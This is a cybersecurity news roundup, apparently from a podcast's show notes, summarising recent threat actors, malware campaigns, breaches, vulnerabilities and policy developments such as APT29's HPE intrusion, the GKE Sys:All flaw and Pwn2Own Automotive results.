π What’s going on in the cyber world today?
Blackwood, NSPX30 Implant, CherryLoader, Modular Malware, Google Kubernetes Flaw, India, Loan Apps, VenomRAT, Kremlin-Linked Hackers, HPE Cloud Email, Ukraine Hackers, Russian Space Center, Mailer Lite Phishing, Israel, Pelephone, Data Leak, Ecommerce Marketplace BuyGoods.com, UK, Voluntary Software Disclosure, Voluntary Healthcare Cyber Goals, Ring, Police Access, Doorbell Camera Footage,Tesla, EV Charging Stations, Cybercrime.
Listen to the full podcast
π¨Β Cyber Alerts
A China-aligned threat actor, identified as the Blackwood group by Slovak cybersecurity firm ESET, has been associated with adversary-in-the-middle (AitM) attacks using an advanced implant called NSPX30. This previously undocumented APT group has been active since at least 2018. NSPX30, a multistage implant, is deployed through the update mechanisms of popular software like Tencent QQ and WPS Office, primarily targeting Chinese and Japanese manufacturing, trading, and engineering companies. The NSPX30 implant allows attackers to conduct packet interception, hide their infrastructure, and execute various malicious activities, including capturing screenshots, logging keystrokes, and creating a reverse shell.
Arctic Wolf Labs has uncovered a novel Go-based malware loader, CherryLoader, disguised as the CherryTree note-taking app. This loader deploys privilege escalation tools, such as PrintSpoofer and JuicyPotatoNG, using a batch file for persistence. Notably, CherryLoader offers modularized features, enabling threat actors to switch exploits without recompiling code, presenting a dynamic threat landscape.
Cybersecurity researchers at Orca have identified a critical loophole in Google Kubernetes Engine (GKE) named Sys:All, potentially allowing threat actors with a Google account to seize control of vulnerable clusters. With an estimated 250,000 active GKE clusters susceptible to this attack vector, the flaw originates from a widespread misconception about the system:authenticated group, including any Google authenticated account. Exploiting this misconfiguration, external threat actors could utilize their Google OAuth 2.0 bearer token for cluster control, leading to severe consequences such as lateral movement, cryptomining, denial-of-service, and sensitive data theft, with no traceable link to the source Google account.
Hackers in India are capitalizing on the surge in demand for digital financial services by using fake loan applications to lure Android users with promises of instant credit. These malicious apps, recently discovered by cybersecurity researchers at Cyfirma, not only steal personal and financial information but also employ manipulative tactics such as demanding money and threatening to share manipulated nude images. With the large user base and increasing reliance on mobile-based financial transactions in India, these fraudulent schemes pose a significant risk to unsuspecting individuals who may fall victim to identity theft and financial fraud.
Hackers are exploiting the widespread use of office documents in business communications to distribute malicious malware easily. The AhnLab Security Intelligence Center (ASEC) has identified a recent tactic where hackers use weaponized Office documents, including a deceptive shortcut file named ‘Survey.docx.lnk,’ to deliver the VenomRAT malware. Disguised as a legitimate Word file, the attack involves a series of steps, including the execution of PowerShell commands and the download of malicious scripts, ultimately leading to the activation of VenomRAT, which conducts keylogging, PC info leaks, and obeys the commands of threat actors.
π₯ Cyber Incidents
Suspected Kremlin-linked hackers affiliated with the APT29 group, also known as BlueBravo and Cozy Bear, infiltrated Hewlett Packard Enterprise’s (HPE) cloud email environment, exfiltrating mailbox data from certain segments, as disclosed in a regulatory filing with the U.S. Securities and Exchange Commission. The intrusion, attributed to the Russian state-sponsored group, began in May 2023 and impacted HPE mailboxes in cybersecurity, go-to-market, business segments, and other functions. This revelation follows Microsoft’s recent disclosure linking the same threat actor to a breach of its corporate systems, underscoring the persistent and sophisticated nature of APT29’s cyber activities.
Ukrainian hackers, identified as the “BO Team,” claim responsibility for a cyberattack on Russia’s State Research Center on Space Hydrometeorology, destroying its database and valuable equipment, according to Ukraine’s defense intelligence directorate (GUR). The targeted organization, also known as “Planeta,” processes data from Earth observation satellites used by various Russian state entities. The hackers allege the destruction of servers, petabytes of information, and paralysis of supercomputers, potentially costing Russia at least $10 million, though verification of these claims remains challenging.
A vulnerability in the digital marketing platform Mailer Lite was exploited by an attacker, resulting in a phishing attack that led to the loss of over $600,000, as revealed by web3 security firm Blockaid. The exploit involved mimicking legitimate emails from prominent web3 firms such as CoinTelegraph, WalletConnect, Token Terminal, and De.Fi. The attacker took advantage of Mailer Lite’s permission to send emails on behalf of these organizations, crafting deceptive emails with malicious links to wallet-draining sites, utilizing lingering “dangling dns” records associated with Mailer Lite after account closures.
Hacktivist group Anonymous Sudan took credit for successfully disrupting Israel’s largest mobile service provider, Pelephone, impacting its two million subscribers. The cyberattack, part of the group’s campaign against Israeli targets, claimed to have hit Pelephone’s entire digital infrastructure. Meanwhile, the Gaza Strip experienced a telecom blackout for the tenth time since the conflict began, limiting residents’ communication abilities, as reported by internet monitoring non-profit NetBlocks.
Jeremiah Fowler, a cybersecurity researcher, revealed a significant data exposure due to a misconfigured cloud database linked to BuyGoods.com, a global ecommerce marketplace. The unprotected database, totaling 198.3 gigabytes, contained over 260,000 records, exposing sensitive information such as affiliate payouts, refund transactions, and personal details of customers and affiliates. The leaked data included customer selfies, identification cards, passports, and unredacted credit card details, posing a global privacy risk for individuals across 17 countries.
π’ Cyber News
The U.K. government considers voluntary rules for software vendors to disclose vulnerabilities responsibly amid concerns over legacy infrastructure management. Following successful hacks affecting key organizations, stakeholders emphasize the need for government intervention to encourage timely disclosure of vulnerabilities, addressing fears of penalization and reputational damage. Respondents suggest the government issue guidance on software bills of materials, certifications for vendors, and regulations for meeting transparency standards to enhance cyber resiliency and effective incident management.
The Department of Health and Human Services (HHS) has released voluntary cybersecurity performance goals for the healthcare sector, outlining essential and enhanced goals to strengthen cybersecurity practices. While voluntary, the goals will inform upcoming HHS rule-making, incentivizing healthcare entities to adopt better cybersecurity postures. The goals address common vulnerabilities, including ransomware, and may be used with potential sticks and carrots for healthcare organizations, with envisioned financial programs to support implementation, according to the HHS concept paper released in December.
Amazon-owned Ring announces the cessation of police requests for doorbell camera footage, a move criticized for privacy concerns. The “Request for Assistance” tool, criticized for surveillance and racial profiling, will be discontinued this week. Despite this change, law enforcement can still share safety information on Ring’s Neighbors app.
During the Pwn2Own Automotive 2024 contest’s first day, security researchers from Synacktiv Team successfully hacked a Tesla Modem, earning $100,000 by exploiting three zero-day bugs to gain root permissions. They also utilized two unique two-bug chains to hack a Ubiquiti Connect EV Station and a JuiceBox 40 Smart EV Charging Station, earning an additional $120,000. The researchers targeted a third exploit chain towards the ChargePoint Home Flex EV charger, earning $16,000. Overall, they collected $295,000 in prizes on the first day. The competition focuses on automotive technologies, allowing researchers to target Tesla in-vehicle infotainment systems, EV chargers, and car operating systems, with cash prizes and even a Tesla car for the top exploits.
The cost of cybercrime is projected to reach $12 trillion by 2025, surpassing previous estimates, according to the Computer Crime Research Center (CCRC). While Cybersecurity Ventures estimated next year’s global cost at $10.5 trillion, the CCRC, citing research by CheckPoint and Orange Cyderdefense, anticipates continued growth in cyberattacks and ransomware. The CCRC expresses concern about the escalating threat landscape fueled by artificial intelligence, predicting attackers will increasingly adopt AI for more sophisticated and targeted cyber offensives in the coming years.
